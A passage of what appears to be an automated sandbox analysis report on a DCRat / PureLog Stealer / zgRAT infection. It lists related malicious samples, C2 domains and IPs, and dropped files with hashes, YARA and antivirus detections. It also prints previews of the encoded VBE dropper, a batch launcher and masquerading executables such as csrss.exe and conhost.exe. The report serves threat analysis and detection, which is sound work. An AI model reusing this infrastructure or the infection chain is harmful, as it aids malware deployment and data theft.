                                                              s5duotgoYD.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                              QMT2731i8k.exeGet hashmaliciousDCRatBrowse
                                                              • 117813cm.n9shteam.in/ExternalRequest.php

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              373292cm.nyashka.topfluent.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 80.211.144.156
                                                              Internal.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 80.211.144.156
                                                              Fatality.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 80.211.144.156
                                                              Nerolore.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 80.211.144.156
                                                              jW5TA1J9Z1.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 80.211.144.156

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              HARMONYHOSTING-ASFRPlZA6b48MW.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              r6cRyCpdfS.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              cbCjTbodwa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              vb8DOBZQ4X.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              dlr.arm7.elfGet hashmaliciousMiraiBrowse
                                                              • 37.44.238.94
                                                              dlr.mips.elfGet hashmaliciousMiraiBrowse
                                                              • 37.44.238.94
                                                              dlr.mpsl.elfGet hashmaliciousMiraiBrowse
                                                              • 37.44.238.94
                                                              dlr.arm6.elfGet hashmaliciousUnknownBrowse
                                                              • 37.44.238.94
                                                              8k1e14tjcx.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                              • 37.44.238.250
                                                              roze.sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 37.44.238.73

                                                              JA3 Fingerprints

                                                              No context

                                                              Dropped Files

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              C:\Users\user\Desktop\BLdnhdFQ.loghz7DzW2Yop.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                3XtEci4Mmo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                  wxl1r0lntg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                    HaLCYOFjMN.exeGet hashmaliciousDCRat, PureLog Stealer, RedLine, XWorm, zgRATBrowse
                                                                      Z90Z9bYzPa.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                        0J5DzstGPi.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                          6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                            aW6kSsgdvv.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                              HMhdtzxEHf.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                kJrNOFEGbQ.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                  Created / dropped Files

                                                                                  C:\Program Files (x86)\Microsoft\886983d96e3d3e

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (721), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):721
                                                                                  Entropy (8bit):5.899221453660396
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Rezhb37ou/6fmTteOoAdsTGSUuMOOM/RwwDKkMOl8ODSp5CGR6rDDq3nLq+vEV3t:RetDMHG0A6TUuF/RwwDrMOy0Sp5CGR6d
                                                                                  MD5:EE6F2A747EF4D7C1FC1B68B0BA6FFC2E
                                                                                  SHA1:2BAE065E2D6D554591E2F1B5A1CC91D6FEF5437F
                                                                                  SHA-256:7B93350BE80D2A2DBF9E6D326DC5F7320FCC1A297E61B7C15B4C17C1B4BD527F
                                                                                  SHA-512:CCDC7F9B001B8C4F7DA19D60D93904A99E51193E073474B966DAD6B17AC1E2B56D12E1738A2820B98979340D6163EF4738A32728CD6B7DCB9F121BF145B01697
                                                                                  Malicious:false
                                                                                  Preview:OvZXhBsLL1MWVkNRFiv8dWkf0GzRujYKLuTpOw7oJoVCIyOlRJwqTVP1L3haLbbmdCKlQiDSlHzzBiWB1O9lws0zfceUPgcrNtjGonUsFeEMgazmgfj7bzzuLUFyDsDFoHlS9PXO3RfSnoSFm1xt7fPX3y5TifoXa9iZyhmRIVEKUhHgBAMM5UII1OZLUDpXmI1oG3QFOgklbFCWrYRhTcbG0ZhjIb6EpqiMpcaIuH7YugrwMCe5wIEJqvxrVq7xjf6ug0rO8JxLfCWUrvXF7ASgmZf4otwDKJyOj7PVVP7nV2nnZdAkT1zjNaHHUwjOWuBVOHutgBtsDpLuv2eLtMtSUPAJ0HBipsQl1RZRsQERHHgiPXVcSYfJAsB8Hl3YALCUYk2ecNccIcKNtc4cwiQQNHkIQbKHXpQ6ELJpe09E6DBihyOoralb4vGR9uOBDVEcLOIhSO85iMUJFCkcMfZ7EzBSF2pum8Ak9iWTprVccq2sa7L7Jwyh6HYWM0cajOSkLuKhqQwfK6eX6T1HrskzKco1K9HzO53OXShqxoR39TX9mAa28Ut0ncZsFSXqJ7QODQ9nwLUCbq00FpPJjO03MCk42ykeRktCCJ6VAwGwAqZ7minaCNH4GXCAqFv7lzv06yy5t3IwHE2gnnSTLJbDdz5pH5p5BJLK5iAyurrJFUxCegWCxbvbXrXH2JyxOMu72skFndjebS7IB

                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):1168
                                                                                  Entropy (8bit):4.448520842480604
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:mZxT0uZhNB+h9PNnqNdt4+lEbNFjMyi07:yuulB+hnqTSfbNtme
                                                                                  MD5:B5189FB271BE514BEC128E0D0809C04E
                                                                                  SHA1:5DD625D27ED30FCA234EC097AD66F6C13A7EDCBE
                                                                                  SHA-256:E1984BA1E3FF8B071F7A320A6F1F18E1D5F4F337D31DC30D5BDFB021DF39060F
                                                                                  SHA-512:F0FCB8F97279579BEB59F58EA89527EE0D86A64C9DE28300F14460BEC6C32DDA72F0E6466573B6654A1E992421D6FE81AE7CCE50F27059F54CF9FDCA6953602E
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................D...<...............0...........D.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...8.....I.n.t.e.r.n.a.l.N.a.m.e...m.s.e.d.g.e...e.x.e.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...@.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.s.e.d.g.e...e.x.e.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <security>.. <requestedPrivileges xmlns="urn:schemas-micro

                                                                                  C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4608
                                                                                  Entropy (8bit):3.902174974132922
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6XmJtjuxZ8RxeOAkFJOcV4MKe28dTd4iE7ckvqBHzuulB+hnqXSfbNtm:P9xvxVx9zJE7ckvklTkZzNt
                                                                                  MD5:3E25AB82C7652239BB3F860C3C95ECA7
                                                                                  SHA1:10D48CC2208E0E69038416D13CFD5310AAC115C0
                                                                                  SHA-256:4E979BA1BD562AB35B1911920384F7126ABBF449B63E76E6B9B00972BAF54331
                                                                                  SHA-512:A80FB6B067E63FB2A00324253DEAACE98A320DA239140ADADC02C4222309EF757E20BB185FA498924D46824A88FFF6700E2405532BD643B879769E8A3BCF505D
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................X'..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..0.............................................................(....*.0..!.......r...pr...p.{....(....(....&..&..*....................0..........r...p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings............#US.........#GUID....... ...#Blob...........WU........%3................................................................

                                                                                  C:\Program Files (x86)\Microsoft\csrss.exe

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Microsoft\csrss.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Microsoft\csrss.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....LTg............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B................0.......H...........................h...}........................................0..........(.... ........8........E........<.......`...8....(.... ........8....(.... ....~{...{|...9....& ....8....(.... ....~{...{....9....& ....8....*....0.......... ........8........E....;...............G...86...~....(W... .... .... ....s....~....([....... ....8....r...ps....z*....~....(_...~....(c... ....?.... ....~{...{....9j...& ....8_......... ....8O...~....:.... ....~{...{l...91...& ....8&.....(.

                                                                                  C:\Recovery\088424020bedd6

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (587), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):587
                                                                                  Entropy (8bit):5.902606128090888
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:WbPpXiUnbtQ1pZfBCgnQ4pmsOA1VVrDZ+T0NUKRL8n:Wtiwbt5gfROsrTGsYn
                                                                                  MD5:2EFC49C41A33029AEF882DD57643055D
                                                                                  SHA1:2C47875F73CAB204939F5F0682BC565A61972B0A
                                                                                  SHA-256:17A1F52215158BBB41B00446B54E471C6D53D361AB7CA7A2F2954248F101CA86
                                                                                  SHA-512:14BC02C949A4C6F8E43B35471E3F65A4E8F02848BFE037D82F0D7C5D36EB9C9B9B45B56D6ADCFCBFC8F736E6ABD0C32539ECF848DB23F22C6D33251F354137B8
                                                                                  Malicious:false
                                                                                  Preview:TjBVZQB9eRyagC64Mf6Oxtond2Fx3diwmD6KYIHmjTX8l4AY1Ou7Ezxk4X1hLNFBtBxcFvfDXUodVqCj2r6oskrwQWQBRkbVNWOjGhSFsrkuKTONUSodRaTITBLtfewx2SQ9bdcUY06AA7m7ICq957EwDFPFVjkN5w11DPw1zUFbeSIWZOkcyx15Od5WNX9zQsFNGu43QyJl2mSv63qH8HZI45mjTZocVPLvM5PoUqM9nQDmLJZTq10JT7SKHVk0KqPmbgiBnBxS4Zeo2AXJAUvdZBbPmFh8GVz7AaKplXppEiO4coRG7azz4wNZETYidyLjjhnb0sinpGZ1xhw8xbBqfACONukS8HLQWoV5B0PO2MKyXVlhgavCwfDifYOFIQoi5JfJL177LwxT0O12JCviWId0lwZmlKGlil3O0cWpcx19rusRhW6GeFMwpohZbUVAqMuOVnBqqGFiRdI0DIFPN9HcZGiM46NHc0Tf9e54UQZY9neMfrVSPFxqESyOEzvt27GaKn0jMK57kscwmVqNk52WDmarprzfeqgBhDC20wFEKzGWzCmsIhJ7FtXhMI3fVac3MaP

                                                                                  C:\Recovery\conhost.exe

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\conhost.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....LTg............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B................0.......H...........................h...}........................................0..........(.... ........8........E........<.......`...8....(.... ........8....(.... ....~{...{|...9....& ....8....(.... ....~{...{....9....& ....8....*....0.......... ........8........E....;...............G...86...~....(W... .... .... ....s....~....([....... ....8....r...ps....z*....~....(_...~....(c... ....?.... ....~{...{....9j...& ....8_......... ....8O...~....:.... ....~{...{l...91...& ....8&.....(.

                                                                                  C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\loader.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):223
                                                                                  Entropy (8bit):5.794994326983631
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:GXkgwqK+NkLzWbHa/JUrFnBaORbM5nCSkXs0/zURJNG:GXkBMCzWLauhBaORbQCSMHzsG
                                                                                  MD5:3569AEC6289503482C7877AD3F205301
                                                                                  SHA1:CF016699D614C9F2E9A899C646CD24ACA6B75FCF
                                                                                  SHA-256:A2BB38C2D2EAFAC2D73AF9247252DE8CFAC9A4F9522B4F66AD73D9A003FC7754
                                                                                  SHA-512:D8DF28CD229E31EB97A705D02AAC38F836B5B05741BDB7C97F4A8D9D3EEC183A3883E39B30C2141E9C8B650C98EDFB51A8CB7FCE1C87D67B15BD9DC52A1B1EF5
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  Preview:#@~^xgAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=zj.D7+Dqk.]E.Yr:.A.G0+DJ&hxm&z0^|WtUHhY/L;H6bW1R(lOEBP!S~6ls/.tz4AAA==^#~@.

                                                                                  C:\ServerWinRuntimeBroker\b1f51d77788e90

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with very long lines (604), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):604
                                                                                  Entropy (8bit):5.883595344241889
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:K2liyH7f3O3xdSZD+Hx1F3FRs+KgJTdcbs84quEOWwEoqbAD5n+IPiXQd:K2AyaqZCx1Fzs+KgJTdcQN4OL1BVnzPz
                                                                                  MD5:F0C1C60CDA6EE57CD2D925B79E6F5FDF
                                                                                  SHA1:61DB5B108995BB7F9C6C0F53B61BBBBA8799C1D9
                                                                                  SHA-256:CCE9855A619CA87BAE8ECA9F0CDCB8434C575D5A506DAD3908171E4976BBB4A7
                                                                                  SHA-512:718601B6A0F7FFF44047E2652F0B6DED466C69604454A4DEA31C589F41472586FC80FC81519655096516E549E4999BB91A529D289907E21E906528C3B8F4330F
                                                                                  Malicious:false
                                                                                  Preview:3yXltGBRnh4R7pVTZBf9GU7gyC1lTzSDDchANH4lx1y1RZev62mdEhej10xqPa7yO0OeHVFSG4LPfGOYhFobNz8g88JWTOVX39mbLAokwTWKWPDumZIKvglZ1sfJMs92jyVfdxMgbDo3cyJt4Yu3FLmXYNjdeeYEUeki4hRyNlsr2r6CiwPy8FwYM8HQNsC6pji8OlyWG5qec4eqQg5sPkFPrMW6aBkejwCSJ8y673rCYS6Rda9rxTrEdTQBP25EVL4p2LhSs8uW2D0ZQEcAC3qPE7zzrwqF7nrNXQZS2r9yjVMad1vLa5Cbeol4Wsk5SpYOWnC9oKHU42qtuYW0BepCkPsspe5KGEg467DzywgPxshm81J7Vu3xAVoG5TUJO7N0VvwwVgBP8ZP2sFtxU7yWKs4lT74ebWAzeqQMEXmzsozkGvXzjgyRI1qn1LdXlgxlYZYCygs7V9nf3TeijF55htrnAnV33PNL1NLrXVACx15JNKthr5xgl1DpsvBLLzEGwcnqHxKOE2IqyiZz4yM8bqjAJg8mTz17xzWvhDZ3ujbttX0KVMQXnFoG2ngkyi4PAK38LoS1YSO2O0QwpyRHieUr

                                                                                  C:\ServerWinRuntimeBroker\chainPorthostCommon.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\loader.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1960448
                                                                                  Entropy (8bit):7.549634788914284
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:rmEq5m1AfIGxLnCllU3WU8zMYCNCsr+QKujfx:rmEq5GGxLnIlP2NgQKGfx
                                                                                  MD5:CF5B49706562BA2047CDA4A451DD573A
                                                                                  SHA1:D7D66016B5EA4215581F208C7972B2FF49CBEED1
                                                                                  SHA-256:74547E5B862BD3691947B78EABBDAB88C468E26144BD03911BE68941376DC89B
                                                                                  SHA-512:0DC54FC8AFE4A1B8CE0D72E215CF617DBC657F4E02CABE7BE694B0D20BE385F63848E49717BD4856547DBB52F8A762E54C63323B53188CC1D8127C54B6A10F1E
                                                                                  Malicious:true
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe, Author: Joe Security
                                                                                  Antivirus:
                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....LTg............................N.... ... ....@.. .......................`............@.....................................K.... .. ....................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc... .... ......................@....reloc.......@......................@..B................0.......H...........................h...}........................................0..........(.... ........8........E........<.......`...8....(.... ........8....(.... ....~{...{|...9....& ....8....(.... ....~{...{....9....& ....8....*....0.......... ........8........E....;...............G...86...~....(W... .... .... ....s....~....([....... ....8....r...ps....z*....~....(_...~....(c... ....?.... ....~{...{....9j...& ....8_......... ....8O...~....:.... ....~{...{l...91...& ....8&.....(.

                                                                                  C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\loader.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):96
                                                                                  Entropy (8bit):5.02491439246222
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:nxcIqTZdv+GVXGMW4vflGluLVA4n:xc9ZdjcovtCuO4n
                                                                                  MD5:CA78C31C7FAD40CA729CE40659DD91FA
                                                                                  SHA1:B649A3669CFFE53122AD50F62F769FAA45B96A92
                                                                                  SHA-256:88B4BE83A053855858771FDA50D7F6FE0CD5F5FD0CD33B3299C28AAB5EB40E2B
                                                                                  SHA-512:B606A335AC5F28030E60A00F99E519240BC3D47D7D88E84EB8DE1F34EF19AE6DF56F01F5F6D83FA215F445732596F0865D630675706626545B15E0C64B0A21EC
                                                                                  Malicious:false
                                                                                  Preview:%gLxEGOSyvTwXOE%%qhQsntRDmWDxGo%..%PESm%"C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"%oTQ%

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainPorthostCommon.exe.log

                                                                                  Download File
                                                                                  Process:C:\ServerWinRuntimeBroker\chainPorthostCommon.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1396
                                                                                  Entropy (8bit):5.350961817021757
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                                  MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                                  SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                                  SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                                  SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutr

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log

                                                                                  Download File
                                                                                  Process:C:\Recovery\conhost.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dasHost.exe.log

                                                                                  Download File
                                                                                  Process:C:\Windows\DiagTrack\Scenarios\dasHost.exe
                                                                                  File Type:CSV text
                                                                                  Category:dropped
                                                                                  Size (bytes):847
                                                                                  Entropy (8bit):5.354334472896228
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQwYHKGSI6oPtHTHhAHKKkb
                                                                                  MD5:9F9FA9EFE67E9BBD165432FA39813EEA
                                                                                  SHA1:6FE9587FB8B6D9FE9FA9ADE987CB8112C294247A
                                                                                  SHA-256:4488EA75E0AC1E2DEB4B7FC35D304CAED2F877A7FB4CC6B8755AE13D709CF37B
                                                                                  SHA-512:F4666179D760D32871DDF54700D6B283AD8DA82FA6B867A214557CBAB757F74ACDFCAD824FB188005C0CEF3B05BF2352B9CA51B2C55AECF762468BB8F5560DB3
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\tQESKTdysPpsVzUyXTE.exe.log

                                                                                  Download File
                                                                                  Process:C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe
                                                                                  File Type:CSV text
